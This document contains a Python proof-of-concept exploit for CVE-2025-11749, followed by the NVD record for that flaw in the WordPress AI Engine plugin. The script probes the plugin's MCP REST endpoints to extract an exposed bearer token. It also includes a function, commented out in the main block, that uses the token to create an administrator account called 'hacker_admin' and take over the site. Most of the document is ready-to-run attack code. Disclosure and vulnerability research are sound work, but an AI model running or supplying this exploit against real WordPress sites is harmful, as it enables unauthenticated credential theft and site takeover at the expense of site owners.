CVE-2025-11749

# CVE-2025-11749 PoC - WordPress AI Engine Token Exposure # Author: Security Research # Date: 2025-11-05 import requests import json import sys TARGET_URL = "http://target-wordpress-site.com" # Replace with target URL def exploit_cve_2025_11749(): """ Exploit for AI Engine plugin <= 3.1.3 Bearer Token exposure This PoC demonstrates how to extract the Bearer token from the vulnerable endpoint. """ print("[*] CVE-2025-11749 - WordPress AI Engine Token Exposure") print("[*] Target:", TARGET_URL) # Step 1: Query the vulnerable MCP API endpoint endpoints = [ "/wp-json/mcp/v1/", "/wp-json/mcp/v1/tools", "/?rest_route=/mcp/v1/", "/?rest_route=/mcp/v1/tools" ] bearer_token = None for endpoint in endpoints: url = TARGET_URL + endpoint print(f"\n[*] Testing endpoint: {url}") try: response = requests.get(url, timeout=10, verify=False) # Check for Bearer token in response if response.status_code == 200: data = response.json() print(f"[+] Response received from {endpoint}") # Search for Bearer token patterns in response response_text = response.text if 'Bearer' in response_text or 'bearer' in response_text: print("[!] Bearer token potentially found!") # Extract token from response for line in response_text.split('\n'): if 'Bearer' in line or 'bearer' in line: print(f"[+] Token line: {line.strip()}") bearer_token = line.strip() break # Also check JSON structure for token fields if isinstance(data, dict): for key, value in data.items(): if isinstance(value, str) and 'Bearer' in value: print(f"[+] Found Bearer token in field '{key}': {value}") bearer_token = value break except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") if bearer_token: print(f"\n[+] SUCCESS! Extracted Bearer Token: {bearer_token}") print("[!] This token can be used to create admin accounts and take over the site") return bearer_token else: print("\n[-] No Bearer token found. Target may not be vulnerable or patch applied.") return None def create_admin_with_token(token): """ Use the extracted token to create an admin account This demonstrates the privilege escalation impact """ print("\n[*] Attempting to create admin account using extracted token...") admin_creation_url = TARGET_URL + "/wp-json/mcp/v1/admin/create" headers = { "Authorization": token, "Content-Type": "application/json" } payload = { "username": "hacker_admin", "email": "[email protected]", "role": "administrator" } try: response = requests.post(admin_creation_url, json=payload, headers=headers) if response.status_code in [200, 201]: print("[+] Admin account created successfully!") print("[+] Full control of WordPress site achieved") return True except Exception as e: print(f"[-] Admin creation failed: {e}") return False if __name__ == "__main__": token = exploit_cve_2025_11749() if token: # Uncomment to execute privilege escalation # create_admin_with_token(token) pass

{"cve": {"id": "CVE-2025-11749", "sourceIdentifier": "[email protected]", "published": "2025-11-05T06:15:33.097", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AI Engine plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.1.3 via the /mcp/v1/ REST API endpoint that exposes the 'Bearer Token' value when 'No-Auth URL' is enabled. This makes it possible for unauthenticated attackers to extract the bearer token, which can be used to gain access to a valid session and perform many actions like creating a new administrator account, leading to privilege escalation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ai-engine/trunk/labs/mcp.php#L226", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3380753/ai-engine#file10", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/06eaf624-aedf-453d-8457-d03a572fac0d?source=cve", "source": "[email protected]"}]}}